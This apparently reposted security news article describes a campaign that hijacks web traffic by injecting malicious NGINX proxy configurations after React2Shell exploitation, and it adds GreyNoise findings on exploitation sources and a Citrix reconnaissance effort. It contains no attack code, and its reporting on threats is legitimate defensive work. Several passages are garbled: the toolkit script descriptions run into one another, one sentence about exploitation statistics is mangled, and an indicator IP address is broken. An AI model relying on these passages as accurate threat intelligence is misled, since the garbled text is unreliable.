Cybersecurity researchers have detailed an active web traffic hijacking campaign that targets NGINX installations and administrative panels such as Baota (BT) in an attempt to route them through attackers’ infrastructure.
Datadog Security Labs said it has observed threat actors associated with recent React2Shell (CVE-2025-55182, CVSS score: 10.0) exploits using malicious NGINX configurations to conduct attacks.
“The malicious configuration intercepts legitimate web traffic between users and websites and routes it through backend servers controlled by the attacker,” security researcher Ryan Simon said. “This campaign targets Asian TLDs (.in, .id, .pe, .bd, .th), Chinese hosting infrastructure (Baota panel), and government and education TLDs (.edu, .gov).”
This activity involves using shell scripts to inject malicious configurations into NGINX, an open-source reverse proxy and load balancer for web traffic management. These “location” settings are designed to capture incoming requests at specific predefined URL paths and redirect them to domains under the attacker’s control via the “proxy_pass” directive.
These scripts are part of a multi-stage toolkit that facilitates the persistence and creation of malicious configuration files that include malicious directives to redirect web traffic. The toolkit components are:
zx.sh acts as an orchestrator that executes subsequent stages through regular utilities such as curl and wget. If the two programs are blocked, they create raw TCP connections and send HTTP requests. bt.sh targets the Baota (BT) admin panel environment and overwrites the NGINX configuration file. 4zdh.sh enumerates common Nginx configuration locations and takes steps to minimize errors when creating new configurations. zdh.sh takes a narrower targeting approach, targeting top-level domains, primarily focused on Linux or containerized NGINX configurations. (TLD) such as .in and .id ok.sh. Generate a report detailing all active NGINX traffic hijacking rules.
“The toolkit contains several scripts designed for target detection and persistence and creation of malicious configuration files containing directives intended to redirect web traffic.
This disclosure was made as GreyNoise mentioned two IP addresses – 193.142.147.[.]209 and 87.121.84[.]24 – React2Shell accounts for 56% of all exploitation attempts observed two months after its release. From January 26, 2026 to February 2, 2026, a total of 1,083 unique source IP addresses were involved in React2Shell exploitation.
“The primary sources deploy separate post-exploitation payloads: one retrieves the cryptomining binary from a staging server, and the other opens a reverse shell directly to the scanner IP,” the threat intelligence firm said. “This approach suggests an interest in interactive access rather than automated resource extraction.”
This also follows the discovery of a coordinated reconnaissance campaign targeting Citrix ADC Gateway and Netscaler Gateway infrastructure using tens of thousands of residential proxies and a single Microsoft Azure IP address (“52.139.3”).[.]76″) to find the login panel.
“This campaign ran two different modes: a large-scale distributed login panel discovery operation with rotation of residential proxies, and an intensive version disclosure sprint hosted on AWS,” GreyNoise said. “They have complementary purposes of both login panel discovery and version enumeration, which suggests coordinated reconnaissance.”
Source link
